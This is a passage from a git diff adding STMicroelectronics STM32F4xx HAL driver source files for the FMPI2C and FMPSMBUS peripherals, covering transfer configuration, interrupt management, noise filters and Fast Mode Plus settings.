HAL_FMPI2C_STATE_READY; + hfmpi2c->Mode = HAL_FMPI2C_MODE_NONE; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + return HAL_ERROR; + } + return HAL_OK; +} + +/** + * @brief Handles FMPI2Cx communication when starting transfer or during transfer (TC or TCR flag are set). + * @param hfmpi2c FMPI2C handle. + * @param DevAddress Specifies the slave address to be programmed. + * @param Size Specifies the number of bytes to be programmed. + * This parameter must be a value between 0 and 255. + * @param Mode New state of the FMPI2C START condition generation. + * This parameter can be one of the following values: + * @arg @ref FMPI2C_RELOAD_MODE Enable Reload mode . + * @arg @ref FMPI2C_AUTOEND_MODE Enable Automatic end mode. + * @arg @ref FMPI2C_SOFTEND_MODE Enable Software end mode. + * @param Request New state of the FMPI2C START condition generation. + * This parameter can be one of the following values: + * @arg @ref FMPI2C_NO_STARTSTOP Don't Generate stop and start condition. + * @arg @ref FMPI2C_GENERATE_STOP Generate stop condition (Size should be set to 0). + * @arg @ref FMPI2C_GENERATE_START_READ Generate Restart for read request. + * @arg @ref FMPI2C_GENERATE_START_WRITE Generate Restart for write request. + * @retval None + */ +static void FMPI2C_TransferConfig(FMPI2C_HandleTypeDef *hfmpi2c, uint16_t DevAddress, uint8_t Size, uint32_t Mode, + uint32_t Request) +{ + /* Check the parameters */ + assert_param(IS_FMPI2C_ALL_INSTANCE(hfmpi2c->Instance)); + assert_param(IS_TRANSFER_MODE(Mode)); + assert_param(IS_TRANSFER_REQUEST(Request)); + + /* update CR2 register */ + MODIFY_REG(hfmpi2c->Instance->CR2, + ((FMPI2C_CR2_SADD | FMPI2C_CR2_NBYTES | FMPI2C_CR2_RELOAD | FMPI2C_CR2_AUTOEND | \ + (FMPI2C_CR2_RD_WRN & (uint32_t)(Request >> (31U - FMPI2C_CR2_RD_WRN_Pos))) | \ + FMPI2C_CR2_START | FMPI2C_CR2_STOP)), \ + (uint32_t)(((uint32_t)DevAddress & FMPI2C_CR2_SADD) | \ + (((uint32_t)Size << FMPI2C_CR2_NBYTES_Pos) & FMPI2C_CR2_NBYTES) | \ + (uint32_t)Mode | (uint32_t)Request)); +} + +/** + * @brief Manage the enabling of Interrupts. + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2C. + * @param InterruptRequest Value of @ref FMPI2C_Interrupt_configuration_definition. + * @retval None + */ +static void FMPI2C_Enable_IRQ(FMPI2C_HandleTypeDef *hfmpi2c, uint16_t InterruptRequest) +{ + uint32_t tmpisr = 0U; + + if ((hfmpi2c->XferISR == FMPI2C_Master_ISR_DMA) || \ + (hfmpi2c->XferISR == FMPI2C_Slave_ISR_DMA)) + { + if ((InterruptRequest & FMPI2C_XFER_LISTEN_IT) == FMPI2C_XFER_LISTEN_IT) + { + /* Enable ERR, STOP, NACK and ADDR interrupts */ + tmpisr |= FMPI2C_IT_ADDRI | FMPI2C_IT_STOPI | FMPI2C_IT_NACKI | FMPI2C_IT_ERRI; + } + + if (InterruptRequest == FMPI2C_XFER_ERROR_IT) + { + /* Enable ERR and NACK interrupts */ + tmpisr |= FMPI2C_IT_ERRI | FMPI2C_IT_NACKI; + } + + if (InterruptRequest == FMPI2C_XFER_CPLT_IT) + { + /* Enable STOP interrupts */ + tmpisr |= (FMPI2C_IT_STOPI | FMPI2C_IT_TCI); + } + + if (InterruptRequest == FMPI2C_XFER_RELOAD_IT) + { + /* Enable TC interrupts */ + tmpisr |= FMPI2C_IT_TCI; + } + } + else + { + if ((InterruptRequest & FMPI2C_XFER_LISTEN_IT) == FMPI2C_XFER_LISTEN_IT) + { + /* Enable ERR, STOP, NACK, and ADDR interrupts */ + tmpisr |= FMPI2C_IT_ADDRI | FMPI2C_IT_STOPI | FMPI2C_IT_NACKI | FMPI2C_IT_ERRI; + } + + if ((InterruptRequest & FMPI2C_XFER_TX_IT) == FMPI2C_XFER_TX_IT) + { + /* Enable ERR, TC, STOP, NACK and RXI interrupts */ + tmpisr |= FMPI2C_IT_ERRI | FMPI2C_IT_TCI | FMPI2C_IT_STOPI | FMPI2C_IT_NACKI | FMPI2C_IT_TXI; + } + + if ((InterruptRequest & FMPI2C_XFER_RX_IT) == FMPI2C_XFER_RX_IT) + { + /* Enable ERR, TC, STOP, NACK and TXI interrupts */ + tmpisr |= FMPI2C_IT_ERRI | FMPI2C_IT_TCI | FMPI2C_IT_STOPI | FMPI2C_IT_NACKI | FMPI2C_IT_RXI; + } + + if (InterruptRequest == FMPI2C_XFER_CPLT_IT) + { + /* Enable STOP interrupts */ + tmpisr |= FMPI2C_IT_STOPI; + } + } + + /* Enable interrupts only at the end */ + /* to avoid the risk of FMPI2C interrupt handle execution before */ + /* all interrupts requested done */ + __HAL_FMPI2C_ENABLE_IT(hfmpi2c, tmpisr); +} + +/** + * @brief Manage the disabling of Interrupts. + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2C. + * @param InterruptRequest Value of @ref FMPI2C_Interrupt_configuration_definition. + * @retval None + */ +static void FMPI2C_Disable_IRQ(FMPI2C_HandleTypeDef *hfmpi2c, uint16_t InterruptRequest) +{ + uint32_t tmpisr = 0U; + + if ((InterruptRequest & FMPI2C_XFER_TX_IT) == FMPI2C_XFER_TX_IT) + { + /* Disable TC and TXI interrupts */ + tmpisr |= FMPI2C_IT_TCI | FMPI2C_IT_TXI; + + if (((uint32_t)hfmpi2c->State & (uint32_t)HAL_FMPI2C_STATE_LISTEN) != (uint32_t)HAL_FMPI2C_STATE_LISTEN) + { + /* Disable NACK and STOP interrupts */ + tmpisr |= FMPI2C_IT_STOPI | FMPI2C_IT_NACKI | FMPI2C_IT_ERRI; + } + } + + if ((InterruptRequest & FMPI2C_XFER_RX_IT) == FMPI2C_XFER_RX_IT) + { + /* Disable TC and RXI interrupts */ + tmpisr |= FMPI2C_IT_TCI | FMPI2C_IT_RXI; + + if (((uint32_t)hfmpi2c->State & (uint32_t)HAL_FMPI2C_STATE_LISTEN) != (uint32_t)HAL_FMPI2C_STATE_LISTEN) + { + /* Disable NACK and STOP interrupts */ + tmpisr |= FMPI2C_IT_STOPI | FMPI2C_IT_NACKI | FMPI2C_IT_ERRI; + } + } + + if ((InterruptRequest & FMPI2C_XFER_LISTEN_IT) == FMPI2C_XFER_LISTEN_IT) + { + /* Disable ADDR, NACK and STOP interrupts */ + tmpisr |= FMPI2C_IT_ADDRI | FMPI2C_IT_STOPI | FMPI2C_IT_NACKI | FMPI2C_IT_ERRI; + } + + if (InterruptRequest == FMPI2C_XFER_ERROR_IT) + { + /* Enable ERR and NACK interrupts */ + tmpisr |= FMPI2C_IT_ERRI | FMPI2C_IT_NACKI; + } + + if (InterruptRequest == FMPI2C_XFER_CPLT_IT) + { + /* Enable STOP interrupts */ + tmpisr |= FMPI2C_IT_STOPI; + } + + if (InterruptRequest == FMPI2C_XFER_RELOAD_IT) + { + /* Enable TC interrupts */ + tmpisr |= FMPI2C_IT_TCI; + } + + /* Disable interrupts only at the end */ + /* to avoid a breaking situation like at "t" time */ + /* all disable interrupts request are not done */ + __HAL_FMPI2C_DISABLE_IT(hfmpi2c, tmpisr); +} + +/** + * @brief Convert FMPI2Cx OTHER_xxx XferOptions to functional XferOptions. + * @param hfmpi2c FMPI2C handle. + * @retval None + */ +static void FMPI2C_ConvertOtherXferOptions(FMPI2C_HandleTypeDef *hfmpi2c) +{ + /* if user set XferOptions to FMPI2C_OTHER_FRAME */ + /* it request implicitly to generate a restart condition */ + /* set XferOptions to FMPI2C_FIRST_FRAME */ + if (hfmpi2c->XferOptions == FMPI2C_OTHER_FRAME) + { + hfmpi2c->XferOptions = FMPI2C_FIRST_FRAME; + } + /* else if user set XferOptions to FMPI2C_OTHER_AND_LAST_FRAME */ + /* it request implicitly to generate a restart condition */ + /* then generate a stop condition at the end of transfer */ + /* set XferOptions to FMPI2C_FIRST_AND_LAST_FRAME */ + else if (hfmpi2c->XferOptions == FMPI2C_OTHER_AND_LAST_FRAME) + { + hfmpi2c->XferOptions = FMPI2C_FIRST_AND_LAST_FRAME; + } + else + { + /* Nothing to do */ + } +} + +/** + * @} + */ + +#endif /* FMPI2C_CR1_PE */ +#endif /* HAL_FMPI2C_MODULE_ENABLED */ +/** + * @} + */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_fmpi2c_ex.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_fmpi2c_ex.c new file mode 100644 index 000000000..0a8f72ccf --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_fmpi2c_ex.c @@ -0,0 +1,261 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_fmpi2c_ex.c + * @author MCD Application Team + * @brief FMPI2C Extended HAL module driver. + * This file provides firmware functions to manage the following + * functionalities of FMPI2C Extended peripheral: + * + Filter Mode Functions + * + FastModePlus Functions + * + @verbatim + ============================================================================== + ##### FMPI2C peripheral Extended features ##### + ============================================================================== + + [..] Comparing to other previous devices, the FMPI2C interface for STM32F4xx + devices contains the following additional features + + (+) Possibility to disable or enable Analog Noise Filter + (+) Use of a configured Digital Noise Filter + (+) Disable or enable Fast Mode Plus + + ##### How to use this driver ##### + ============================================================================== + [..] This driver provides functions to: + (#) Configure FMPI2C Analog noise filter using the function HAL_FMPI2CEx_ConfigAnalogFilter() + (#) Configure FMPI2C Digital noise filter using the function HAL_FMPI2CEx_ConfigDigitalFilter() + (#) Configure the enable or disable of fast mode plus driving capability using the functions : + (++) HAL_FMPI2CEx_EnableFastModePlus() + (++) HAL_FMPI2CEx_DisableFastModePlus() + @endverbatim + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2016 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +/** @defgroup FMPI2CEx FMPI2CEx + * @brief FMPI2C Extended HAL module driver + * @{ + */ + +#ifdef HAL_FMPI2C_MODULE_ENABLED +#if defined(FMPI2C_CR1_PE) + +/* Private typedef -----------------------------------------------------------*/ +/* Private define ------------------------------------------------------------*/ +/* Private macro -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private function prototypes -----------------------------------------------*/ +/* Private functions ---------------------------------------------------------*/ + +/** @defgroup FMPI2CEx_Exported_Functions FMPI2C Extended Exported Functions + * @{ + */ + +/** @defgroup FMPI2CEx_Exported_Functions_Group1 Filter Mode Functions + * @brief Filter Mode Functions + * +@verbatim + =============================================================================== + ##### Filter Mode Functions ##### + =============================================================================== + [..] This section provides functions allowing to: + (+) Configure Noise Filters + +@endverbatim + * @{ + */ + +/** + * @brief Configure FMPI2C Analog noise filter. + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2Cx peripheral. + * @param AnalogFilter New state of the Analog filter. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_FMPI2CEx_ConfigAnalogFilter(FMPI2C_HandleTypeDef *hfmpi2c, uint32_t AnalogFilter) +{ + /* Check the parameters */ + assert_param(IS_FMPI2C_ALL_INSTANCE(hfmpi2c->Instance)); + assert_param(IS_FMPI2C_ANALOG_FILTER(AnalogFilter)); + + if (hfmpi2c->State == HAL_FMPI2C_STATE_READY) + { + /* Process Locked */ + __HAL_LOCK(hfmpi2c); + + hfmpi2c->State = HAL_FMPI2C_STATE_BUSY; + + /* Disable the selected FMPI2C peripheral */ + __HAL_FMPI2C_DISABLE(hfmpi2c); + + /* Reset FMPI2Cx ANOFF bit */ + hfmpi2c->Instance->CR1 &= ~(FMPI2C_CR1_ANFOFF); + + /* Set analog filter bit*/ + hfmpi2c->Instance->CR1 |= AnalogFilter; + + __HAL_FMPI2C_ENABLE(hfmpi2c); + + hfmpi2c->State = HAL_FMPI2C_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Configure FMPI2C Digital noise filter. + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2Cx peripheral. + * @param DigitalFilter Coefficient of digital noise filter between Min_Data=0x00 and Max_Data=0x0F. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_FMPI2CEx_ConfigDigitalFilter(FMPI2C_HandleTypeDef *hfmpi2c, uint32_t DigitalFilter) +{ + uint32_t tmpreg; + + /* Check the parameters */ + assert_param(IS_FMPI2C_ALL_INSTANCE(hfmpi2c->Instance)); + assert_param(IS_FMPI2C_DIGITAL_FILTER(DigitalFilter)); + + if (hfmpi2c->State == HAL_FMPI2C_STATE_READY) + { + /* Process Locked */ + __HAL_LOCK(hfmpi2c); + + hfmpi2c->State = HAL_FMPI2C_STATE_BUSY; + + /* Disable the selected FMPI2C peripheral */ + __HAL_FMPI2C_DISABLE(hfmpi2c); + + /* Get the old register value */ + tmpreg = hfmpi2c->Instance->CR1; + + /* Reset FMPI2Cx DNF bits [11:8] */ + tmpreg &= ~(FMPI2C_CR1_DNF); + + /* Set FMPI2Cx DNF coefficient */ + tmpreg |= DigitalFilter << 8U; + + /* Store the new register value */ + hfmpi2c->Instance->CR1 = tmpreg; + + __HAL_FMPI2C_ENABLE(hfmpi2c); + + hfmpi2c->State = HAL_FMPI2C_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} +/** + * @} + */ + +/** @defgroup FMPI2CEx_Exported_Functions_Group3 Fast Mode Plus Functions + * @brief Fast Mode Plus Functions + * +@verbatim + =============================================================================== + ##### Fast Mode Plus Functions ##### + =============================================================================== + [..] This section provides functions allowing to: + (+) Configure Fast Mode Plus + +@endverbatim + * @{ + */ + +/** + * @brief Enable the FMPI2C fast mode plus driving capability. + * @param ConfigFastModePlus Selects the pin. + * This parameter can be one of the @ref FMPI2CEx_FastModePlus values + * @note For FMPI2C1, fast mode plus driving capability can be enabled on all selected + * FMPI2C1 pins using FMPI2C_FASTMODEPLUS_FMPI2C1 parameter or independently + * on each one of the following pins PB6, PB7, PB8 and PB9. + * @note For remaining FMPI2C1 pins (PA14, PA15...) fast mode plus driving capability + * can be enabled only by using FMPI2C_FASTMODEPLUS_FMPI2C1 parameter. + * @retval None + */ +void HAL_FMPI2CEx_EnableFastModePlus(uint32_t ConfigFastModePlus) +{ + /* Check the parameter */ + assert_param(IS_FMPI2C_FASTMODEPLUS(ConfigFastModePlus)); + + /* Enable SYSCFG clock */ + __HAL_RCC_SYSCFG_CLK_ENABLE(); + + /* Enable fast mode plus driving capability for selected pin */ + SET_BIT(SYSCFG->CFGR, (uint32_t)ConfigFastModePlus); +} + +/** + * @brief Disable the FMPI2C fast mode plus driving capability. + * @param ConfigFastModePlus Selects the pin. + * This parameter can be one of the @ref FMPI2CEx_FastModePlus values + * @note For FMPI2C1, fast mode plus driving capability can be disabled on all selected + * FMPI2C1 pins using FMPI2C_FASTMODEPLUS_FMPI2C1 parameter or independently + * on each one of the following pins PB6, PB7, PB8 and PB9. + * @note For remaining FMPI2C1 pins (PA14, PA15...) fast mode plus driving capability + * can be disabled only by using FMPI2C_FASTMODEPLUS_FMPI2C1 parameter. + * @retval None + */ +void HAL_FMPI2CEx_DisableFastModePlus(uint32_t ConfigFastModePlus) +{ + /* Check the parameter */ + assert_param(IS_FMPI2C_FASTMODEPLUS(ConfigFastModePlus)); + + /* Enable SYSCFG clock */ + __HAL_RCC_SYSCFG_CLK_ENABLE(); + + /* Disable fast mode plus driving capability for selected pin */ + CLEAR_BIT(SYSCFG->CFGR, (uint32_t)ConfigFastModePlus); +} +/** + * @} + */ +/** + * @} + */ + +#endif /* FMPI2C_CR1_PE */ +#endif /* HAL_FMPI2C_MODULE_ENABLED */ +/** + * @} + */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_fmpsmbus.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_fmpsmbus.c new file mode 100644 index 000000000..578ecc5bf --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_fmpsmbus.c @@ -0,0 +1,2746 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_fmpsmbus.c + * @author MCD Application Team + * @brief FMPSMBUS HAL module driver. + * This file provides firmware functions to manage the following + * functionalities of the System Management Bus (SMBus) peripheral, + * based on I2C principles of operation : + * + Initialization and de-initialization functions + * + IO operation functions + * + Peripheral State and Errors functions + * + @verbatim + ============================================================================== + ##### How to use this driver ##### + ============================================================================== + [..] + The FMPSMBUS HAL driver can be used as follows: + + (#) Declare a FMPSMBUS_HandleTypeDef handle structure, for example: + FMPSMBUS_HandleTypeDef hfmpsmbus; + + (#)Initialize the FMPSMBUS low level resources by implementing the HAL_FMPSMBUS_MspInit() API: + (##) Enable the FMPSMBUSx interface clock + (##) FMPSMBUS pins configuration + (+++) Enable the clock for the FMPSMBUS GPIOs + (+++) Configure FMPSMBUS pins as alternate function open-drain + (##) NVIC configuration if you need to use interrupt process + (+++) Configure the FMPSMBUSx interrupt priority + (+++) Enable the NVIC FMPSMBUS IRQ Channel + + (#) Configure the Communication Clock Timing, Bus Timeout, Own Address1, Master Addressing mode, + Dual Addressing mode, Own Address2, Own Address2 Mask, General call, Nostretch mode, + Peripheral mode and Packet Error Check mode in the hfmpsmbus Init structure. + + (#) Initialize the FMPSMBUS registers by calling the HAL_FMPSMBUS_Init() API: + (++) These API's configures also the low level Hardware GPIO, CLOCK, CORTEX...etc) + by calling the customized HAL_FMPSMBUS_MspInit(&hfmpsmbus) API. + + (#) To check if target device is ready for communication, use the function HAL_FMPSMBUS_IsDeviceReady() + + (#) For FMPSMBUS IO operations, only one mode of operations is available within this driver + + *** Interrupt mode IO operation *** + =================================== + [..] + (+) Transmit in master/host FMPSMBUS mode an amount of data in non-blocking mode using HAL_FMPSMBUS_Master_Transmit_IT() + (++) At transmission end of transfer HAL_FMPSMBUS_MasterTxCpltCallback() is executed and user can + add his own code by customization of function pointer HAL_FMPSMBUS_MasterTxCpltCallback() + (+) Receive in master/host FMPSMBUS mode an amount of data in non-blocking mode using HAL_FMPSMBUS_Master_Receive_IT() + (++) At reception end of transfer HAL_FMPSMBUS_MasterRxCpltCallback() is executed and user can + add his own code by customization of function pointer HAL_FMPSMBUS_MasterRxCpltCallback() + (+) Abort a master/host FMPSMBUS process communication with Interrupt using HAL_FMPSMBUS_Master_Abort_IT() + (++) The associated previous transfer callback is called at the end of abort process + (++) mean HAL_FMPSMBUS_MasterTxCpltCallback() in case of previous state was master transmit + (++) mean HAL_FMPSMBUS_MasterRxCpltCallback() in case of previous state was master receive + (+) Enable/disable the Address listen mode in slave/device or host/slave FMPSMBUS mode + using HAL_FMPSMBUS_EnableListen_IT() HAL_FMPSMBUS_DisableListen_IT() + (++) When address slave/device FMPSMBUS match, HAL_FMPSMBUS_AddrCallback() is executed and user can + add his own code to check the Address Match Code and the transmission direction request by master/host (Write/Read). + (++) At Listen mode end HAL_FMPSMBUS_ListenCpltCallback() is executed and user can + add his own code by customization of function pointer HAL_FMPSMBUS_ListenCpltCallback() + (+) Transmit in slave/device FMPSMBUS mode an amount of data in non-blocking mode using HAL_FMPSMBUS_Slave_Transmit_IT() + (++) At transmission end of transfer HAL_FMPSMBUS_SlaveTxCpltCallback() is executed and user can + add his own code by customization of function pointer HAL_FMPSMBUS_SlaveTxCpltCallback() + (+) Receive in slave/device FMPSMBUS mode an amount of data in non-blocking mode using HAL_FMPSMBUS_Slave_Receive_IT() + (++) At reception end of transfer HAL_FMPSMBUS_SlaveRxCpltCallback() is executed and user can + add his own code by customization of function pointer HAL_FMPSMBUS_SlaveRxCpltCallback() + (+) Enable/Disable the FMPSMBUS alert mode using HAL_FMPSMBUS_EnableAlert_IT() HAL_FMPSMBUS_DisableAlert_IT() + (++) When FMPSMBUS Alert is generated HAL_FMPSMBUS_ErrorCallback() is executed and user can + add his own code by customization of function pointer HAL_FMPSMBUS_ErrorCallback() + to check the Alert Error Code using function HAL_FMPSMBUS_GetError() + (+) Get HAL state machine or error values using HAL_FMPSMBUS_GetState() or HAL_FMPSMBUS_GetError() + (+) In case of transfer Error, HAL_FMPSMBUS_ErrorCallback() function is executed and user can + add his own code by customization of function pointer HAL_FMPSMBUS_ErrorCallback() + to check the Error Code using function HAL_FMPSMBUS_GetError() + + *** FMPSMBUS HAL driver macros list *** + ================================== + [..] + Below the list of most used macros in FMPSMBUS HAL driver. + + (+) __HAL_FMPSMBUS_ENABLE: Enable the FMPSMBUS peripheral + (+) __HAL_FMPSMBUS_DISABLE: Disable the FMPSMBUS peripheral + (+) __HAL_FMPSMBUS_GET_FLAG: Check whether the specified FMPSMBUS flag is set or not + (+) __HAL_FMPSMBUS_CLEAR_FLAG: Clear the specified FMPSMBUS pending flag + (+) __HAL_FMPSMBUS_ENABLE_IT: Enable the specified FMPSMBUS interrupt + (+) __HAL_FMPSMBUS_DISABLE_IT: Disable the specified FMPSMBUS interrupt + + *** Callback registration *** + ============================================= + [..] + The compilation flag USE_HAL_FMPSMBUS_REGISTER_CALLBACKS when set to 1 + allows the user to configure dynamically the driver callbacks. + Use Functions HAL_FMPSMBUS_RegisterCallback() or HAL_FMPSMBUS_RegisterAddrCallback() + to register an interrupt callback. + [..] + Function HAL_FMPSMBUS_RegisterCallback() allows to register following callbacks: + (+) MasterTxCpltCallback : callback for Master transmission end of transfer. + (+) MasterRxCpltCallback : callback for Master reception end of transfer. + (+) SlaveTxCpltCallback : callback for Slave transmission end of transfer. + (+) SlaveRxCpltCallback : callback for Slave reception end of transfer. + (+) ListenCpltCallback : callback for end of listen mode. + (+) ErrorCallback : callback for error detection. + (+) MspInitCallback : callback for Msp Init. + (+) MspDeInitCallback : callback for Msp DeInit. + This function takes as parameters the HAL peripheral handle, the Callback ID + and a pointer to the user callback function. + [..] + For specific callback AddrCallback use dedicated register callbacks : HAL_FMPSMBUS_RegisterAddrCallback. + [..] + Use function HAL_FMPSMBUS_UnRegisterCallback to reset a callback to the default + weak function. + HAL_FMPSMBUS_UnRegisterCallback takes as parameters the HAL peripheral handle, + and the Callback ID. + This function allows to reset following callbacks: + (+) MasterTxCpltCallback : callback for Master transmission end of transfer. + (+) MasterRxCpltCallback : callback for Master reception end of transfer. + (+) SlaveTxCpltCallback : callback for Slave transmission end of transfer. + (+) SlaveRxCpltCallback : callback for Slave reception end of transfer. + (+) ListenCpltCallback : callback for end of listen mode. + (+) ErrorCallback : callback for error detection. + (+) MspInitCallback : callback for Msp Init. + (+) MspDeInitCallback : callback for Msp DeInit. + [..] + For callback AddrCallback use dedicated register callbacks : HAL_FMPSMBUS_UnRegisterAddrCallback. + [..] + By default, after the HAL_FMPSMBUS_Init() and when the state is HAL_FMPI2C_STATE_RESET + all callbacks are set to the corresponding weak functions: + examples HAL_FMPSMBUS_MasterTxCpltCallback(), HAL_FMPSMBUS_MasterRxCpltCallback(). + Exception done for MspInit and MspDeInit functions that are + reset to the legacy weak functions in the HAL_FMPSMBUS_Init()/ HAL_FMPSMBUS_DeInit() only when + these callbacks are null (not registered beforehand). + If MspInit or MspDeInit are not null, the HAL_FMPSMBUS_Init()/ HAL_FMPSMBUS_DeInit() + keep and use the user MspInit/MspDeInit callbacks (registered beforehand) whatever the state. + [..] + Callbacks can be registered/unregistered in HAL_FMPI2C_STATE_READY state only. + Exception done MspInit/MspDeInit functions that can be registered/unregistered + in HAL_FMPI2C_STATE_READY or HAL_FMPI2C_STATE_RESET state, + thus registered (user) MspInit/DeInit callbacks can be used during the Init/DeInit. + Then, the user first registers the MspInit/MspDeInit user callbacks + using HAL_FMPSMBUS_RegisterCallback() before calling HAL_FMPSMBUS_DeInit() + or HAL_FMPSMBUS_Init() function. + [..] + When the compilation flag USE_HAL_FMPSMBUS_REGISTER_CALLBACKS is set to 0 or + not defined, the callback registration feature is not available and all callbacks + are set to the corresponding weak functions. + + [..] + (@) You can refer to the FMPSMBUS HAL driver header file for more useful macros + + @endverbatim + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2016 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +/** @defgroup FMPSMBUS FMPSMBUS + * @brief FMPSMBUS HAL module driver + * @{ + */ + +#ifdef HAL_FMPSMBUS_MODULE_ENABLED + +#if defined(FMPI2C_CR1_PE) +/* Private typedef -----------------------------------------------------------*/ +/* Private constants ---------------------------------------------------------*/ +/** @defgroup FMPSMBUS_Private_Define FMPSMBUS Private Constants + * @{ + */ +#define TIMING_CLEAR_MASK (0xF0FFFFFFUL) /*!< FMPSMBUS TIMING clear register Mask */ +#define HAL_TIMEOUT_ADDR (10000U) /*!< 10 s */ +#define HAL_TIMEOUT_BUSY (25U) /*!< 25 ms */ +#define HAL_TIMEOUT_DIR (25U) /*!< 25 ms */ +#define HAL_TIMEOUT_RXNE (25U) /*!< 25 ms */ +#define HAL_TIMEOUT_STOPF (25U) /*!< 25 ms */ +#define HAL_TIMEOUT_TC (25U) /*!< 25 ms */ +#define HAL_TIMEOUT_TCR (25U) /*!< 25 ms */ +#define HAL_TIMEOUT_TXIS (25U) /*!< 25 ms */ +#define MAX_NBYTE_SIZE 255U +/** + * @} + */ + +/* Private macro -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private function prototypes -----------------------------------------------*/ +/** @addtogroup FMPSMBUS_Private_Functions FMPSMBUS Private Functions + * @{ + */ +static HAL_StatusTypeDef FMPSMBUS_WaitOnFlagUntilTimeout(FMPSMBUS_HandleTypeDef *hfmpsmbus, uint32_t Flag, + FlagStatus Status, uint32_t Timeout); + +static void FMPSMBUS_Enable_IRQ(FMPSMBUS_HandleTypeDef *hfmpsmbus, uint32_t InterruptRequest); +static void FMPSMBUS_Disable_IRQ(FMPSMBUS_HandleTypeDef *hfmpsmbus, uint32_t InterruptRequest); +static HAL_StatusTypeDef FMPSMBUS_Master_ISR(FMPSMBUS_HandleTypeDef *hfmpsmbus, uint32_t StatusFlags); +static HAL_StatusTypeDef FMPSMBUS_Slave_ISR(FMPSMBUS_HandleTypeDef *hfmpsmbus, uint32_t StatusFlags); + +static void FMPSMBUS_ConvertOtherXferOptions(FMPSMBUS_HandleTypeDef *hfmpsmbus); + +static void FMPSMBUS_ITErrorHandler(FMPSMBUS_HandleTypeDef *hfmpsmbus); + +static void FMPSMBUS_TransferConfig(FMPSMBUS_HandleTypeDef *hfmpsmbus, uint16_t DevAddress, uint8_t Size, + uint32_t Mode, uint32_t Request); +/** + * @} + */ + +/* Exported functions --------------------------------------------------------*/ + +/** @defgroup FMPSMBUS_Exported_Functions FMPSMBUS Exported Functions + * @{ + */ + +/** @defgroup FMPSMBUS_Exported_Functions_Group1 Initialization and de-initialization functions + * @brief Initialization and Configuration functions + * +@verbatim + =============================================================================== + ##### Initialization and de-initialization functions ##### + =============================================================================== + [..] This subsection provides a set of functions allowing to initialize and + deinitialize the FMPSMBUSx peripheral: + + (+) User must Implement HAL_FMPSMBUS_MspInit() function in which he configures + all related peripherals resources (CLOCK, GPIO, IT and NVIC ). + + (+) Call the function HAL_FMPSMBUS_Init() to configure the selected device with + the selected configuration: + (++) Clock Timing + (++) Bus Timeout + (++) Analog Filer mode + (++) Own Address 1 + (++) Addressing mode (Master, Slave) + (++) Dual Addressing mode + (++) Own Address 2 + (++) Own Address 2 Mask + (++) General call mode + (++) Nostretch mode + (++) Packet Error Check mode + (++) Peripheral mode + + + (+) Call the function HAL_FMPSMBUS_DeInit() to restore the default configuration + of the selected FMPSMBUSx peripheral. + + (+) Enable/Disable Analog/Digital filters with HAL_FMPSMBUS_ConfigAnalogFilter() and + HAL_FMPSMBUS_ConfigDigitalFilter(). + +@endverbatim + * @{ + */ + +/** + * @brief Initialize the FMPSMBUS according to the specified parameters + * in the FMPSMBUS_InitTypeDef and initialize the associated handle. + * @param hfmpsmbus Pointer to a FMPSMBUS_HandleTypeDef structure that contains + * the configuration information for the specified FMPSMBUS. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_FMPSMBUS_Init(FMPSMBUS_HandleTypeDef *hfmpsmbus) +{ + /* Check the FMPSMBUS handle allocation */ + if (hfmpsmbus == NULL) + { + return HAL_ERROR; + } + + /* Check the parameters */ + assert_param(IS_FMPSMBUS_ALL_INSTANCE(hfmpsmbus->Instance)); + assert_param(IS_FMPSMBUS_ANALOG_FILTER(hfmpsmbus->Init.AnalogFilter)); + assert_param(IS_FMPSMBUS_OWN_ADDRESS1(hfmpsmbus->Init.OwnAddress1)); + assert_param(IS_FMPSMBUS_ADDRESSING_MODE(hfmpsmbus->Init.AddressingMode)); + assert_param(IS_FMPSMBUS_DUAL_ADDRESS(hfmpsmbus->Init.DualAddressMode)); + assert_param(IS_FMPSMBUS_OWN_ADDRESS2(hfmpsmbus->Init.OwnAddress2)); + 